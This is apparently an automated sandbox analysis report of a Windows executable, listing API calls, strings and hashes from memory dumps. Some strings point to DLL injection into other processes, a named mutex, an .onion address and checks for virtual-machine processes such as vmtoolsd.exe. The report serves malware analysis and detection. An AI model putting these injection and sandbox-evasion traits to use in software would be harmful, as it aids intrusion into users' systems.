                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                              • API String ID: 0-626581767
                                                              • Opcode ID: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction ID: 0ae21cd2affb92439e9d6b24f9167d9253c8ca15ed842762288491891e5b1343
                                                              • Opcode Fuzzy Hash: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction Fuzzy Hash: 9251D4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: ErrorLast$Create$CloseFirstHandleMutexOpenProcessProcess32SleepSnapshotToolhelp32
                                                              • String ID: ID: $) terminated$, (pid: $DLL filename: $Global\qtxp9g8w$failed to inject DLL: $failed to open process: $failed to wait for an object: $injected$not enough arguments$process $process name:
                                                              • API String ID: 1655518464-3362440526
                                                              • Opcode ID: 811615c686dd7e2b8bf127d5529c178edcab6273597339bb3635e6138e25b633
                                                              • Instruction ID: a6dd7bec8a8874dee0ffbb50ef5179667c9645bc8df6185b324321b93e8b5614
                                                              • Opcode Fuzzy Hash: 811615c686dd7e2b8bf127d5529c178edcab6273597339bb3635e6138e25b633
                                                              • Instruction Fuzzy Hash: 29B15F21B1FA03B6EA14EB25E8941BA6391BF85BD0F404135D94EC73AEEE7CE5758340
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 59578552-0
                                                              • Opcode ID: bbef7475fec8497ee8e19fb3446075f7fe39c188487bf22197f3ecdf8fe8b6c9
                                                              • Instruction ID: d4669e2bc16a293f6a556d0d42e361bf07c6684617916dd6fb8587e562b6f8b3
                                                              • Opcode Fuzzy Hash: bbef7475fec8497ee8e19fb3446075f7fe39c188487bf22197f3ecdf8fe8b6c9
                                                              • Instruction Fuzzy Hash: C6E0EC60E5F143A7F528377558420BC31912F4C370FB04236E12EC23CACD2D75B14A62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00B31F1
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6A00B316F,?,?,FFFFFFFE,00007FF6A00B2196), ref: 00007FF6A00B32B0
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6A00B316F,?,?,FFFFFFFE,00007FF6A00B2196), ref: 00007FF6A00B3330
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 2210144848-0
                                                              • Opcode ID: 26715ff7cc39d96f6d37d079edff232458c65da7b58ef50fd20d28b75933661f
                                                              • Instruction ID: 2c29168098848d363dad27f02da0b4a0da964754ae5859c65486c8f05ea4c159
                                                              • Opcode Fuzzy Hash: 26715ff7cc39d96f6d37d079edff232458c65da7b58ef50fd20d28b75933661f
                                                              • Instruction Fuzzy Hash: 5B81D222E1A613A9F7109F6598402BE27A0FB46B95FA44135DE0ED379BDF3CE561C310
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: String$try_get_function
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 1203122356-3893581201
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 1321466686-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00B632C: GetOEMCP.KERNEL32 ref: 00007FF6A00B6356
                                                              • IsValidCodePage.KERNEL32(?,?,?,?,00000000,?,?,00007FF6A00B6703), ref: 00007FF6A00B6983
                                                              • GetCPInfo.KERNEL32(?,?,?,?,00000000,?,?,00007FF6A00B6703), ref: 00007FF6A00B69CF
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: FileHandleType
                                                              • String ID:
                                                              • API String ID: 3000768030-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                              • String ID:
                                                              • API String ID: 3548387204-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6A00AB426,?,?,?,00007FF6A00AB756,?,?,?,?,00007FF6A009D9C7), ref: 00007FF6A00B6BE8
                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF6A00AB426,?,?,?,00007FF6A00AB756,?,?,?,?,00007FF6A009D9C7), ref: 00007FF6A00B6C55
                                                              Similarity
                                                              • API ID: EnvironmentStrings$Free
                                                              • String ID:
                                                              • API String ID: 3328510275-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6A00AEF39,?,?,0000E94925CDEBB0,00007FF6A00A57A9,?,?,?,?,00007FF6A00B507E,?,?,00000000), ref: 00007FF6A00AE5C1
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 808467561-2761157908
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • TranslateName.LIBCMT ref: 00007FF6A00B905D
                                                              • TranslateName.LIBCMT ref: 00007FF6A00B9098
                                                              • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF6A00AC414), ref: 00007FF6A00B90DD
                                                              • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF6A00AC414), ref: 00007FF6A00B9105
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorLastNameTranslate$CodePageValid
                                                              • String ID: utf8
                                                              • API String ID: 2136749100-905460609
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                              • String ID:
                                                              • API String ID: 3939093798-0
                                                              • Opcode ID: 29727b5a06f9503e6d308d159dcfbecb688055babae23bfc4a2a52b6b7345a27
                                                              • Instruction ID: dbbb0ce5e44a668032accf859f41a04c7f013f416a64e1a36867708413401561
                                                              • Opcode Fuzzy Hash: 29727b5a06f9503e6d308d159dcfbecb688055babae23bfc4a2a52b6b7345a27
                                                              • Instruction Fuzzy Hash: 47716B22B1A643AAFF609B64D8506B937B0BF8A744F444135CE0D9379AEF3CE865C351
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite$Console
                                                              • String ID:
                                                              • API String ID: 786612050-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: memcpy_s
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 1502251526-3924258884
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                              • String ID: %
                                                              • API String ID: 3668304517-2567322570
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                              • String ID: %
                                                              • API String ID: 3668304517-2567322570
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Wcsftime$_invalid_parameter_noinfo
                                                              • String ID: ios_base::failbit set
                                                              • API String ID: 4239037671-3924258884
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: InfoLocaletry_get_function
                                                              • String ID: GetLocaleInfoEx
                                                              • API String ID: 2200034068-2904428671
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF6A00B9510
                                                                • Part of subcall function 00007FF6A00B5898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00B58B5
                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF6A00B9559
                                                                • Part of subcall function 00007FF6A00B5898: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00B590E
                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF6A00B9624
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3644580040-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: gfffffff
                                                              • API String ID: 3215553584-1523873471
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00AF939
                                                                • Part of subcall function 00007FF6A00A56A0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6A00A564D), ref: 00007FF6A00A56A9
                                                                • Part of subcall function 00007FF6A00A56A0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6A00A564D), ref: 00007FF6A00A56CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                              • String ID: -
                                                              • API String ID: 4036615347-2547889144
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: ExceptionRaise_clrfp
                                                              • String ID:
                                                              • API String ID: 15204871-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • GetLocaleInfoW.KERNEL32 ref: 00007FF6A00B9758
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6A00B9B27,?,00000000,00000092,?,?,00000000,?,00007FF6A00AC40D), ref: 00007FF6A00B93DA
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • GetLocaleInfoW.KERNEL32(?,?,?,00007FF6A00B96A1), ref: 00007FF6A00B992F
                                                              Similarity
                                                              • API ID: ErrorLast$InfoLocale
                                                              • String ID:
                                                              • API String ID: 3736152602-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6A00B9AE3,?,00000000,00000092,?,?,00000000,?,00007FF6A00AC40D), ref: 00007FF6A00B948A
                                                              Similarity
                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2417226690-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6A00B0E91,?,?,?,?,?,?,?,?,00000000,00007FF6A00B8988), ref: 00007FF6A00B0ADB
                                                              Similarity
                                                              • API ID: EnumLocalesSystem
                                                              • String ID:
                                                              • API String ID: 2099609381-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: 0
                                                              • API String ID: 3215553584-4108050209
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00007FF6A00B497D
                                                                • Part of subcall function 00007FF6A00AE56C: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6A00AEF39,?,?,0000E94925CDEBB0,00007FF6A00A57A9,?,?,?,?,00007FF6A00B507E,?,?,00000000), ref: 00007FF6A00AE5C1
                                                                • Part of subcall function 00007FF6A00AE5E4: HeapFree.KERNEL32(?,?,00007FF6A00AD60F,00007FF6A00B7DC0,?,?,?,00007FF6A00B8143,?,?,0000E94925CDEBB0,00007FF6A00B8688,?,?,?,00007FF6A00B85BB), ref: 00007FF6A00AE5FA
                                                                • Part of subcall function 00007FF6A00AE5E4: GetLastError.KERNEL32(?,?,00007FF6A00AD60F,00007FF6A00B7DC0,?,?,?,00007FF6A00B8143,?,?,0000E94925CDEBB0,00007FF6A00B8688,?,?,?,00007FF6A00B85BB), ref: 00007FF6A00AE60C
                                                                • Part of subcall function 00007FF6A00BB76C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00BB79A
                                                              Similarity
                                                              • API ID: ErrorHeapLast$AllocateFree_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3806578645-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3827717455-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
                                                              • String ID:
                                                              • API String ID: 959782435-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B135B
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B137A
                                                                • Part of subcall function 00007FF6A00B0B08: GetProcAddress.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0C60
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1399
                                                                • Part of subcall function 00007FF6A00B0B08: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0BAB
                                                                • Part of subcall function 00007FF6A00B0B08: GetLastError.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0BB9
                                                                • Part of subcall function 00007FF6A00B0B08: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0BFB
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B13B8
                                                                • Part of subcall function 00007FF6A00B0B08: FreeLibrary.KERNEL32(?,?,00000002,00007FF6A00B0FAA,?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9), ref: 00007FF6A00B0C34
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B13D7
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B13F6
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B1415
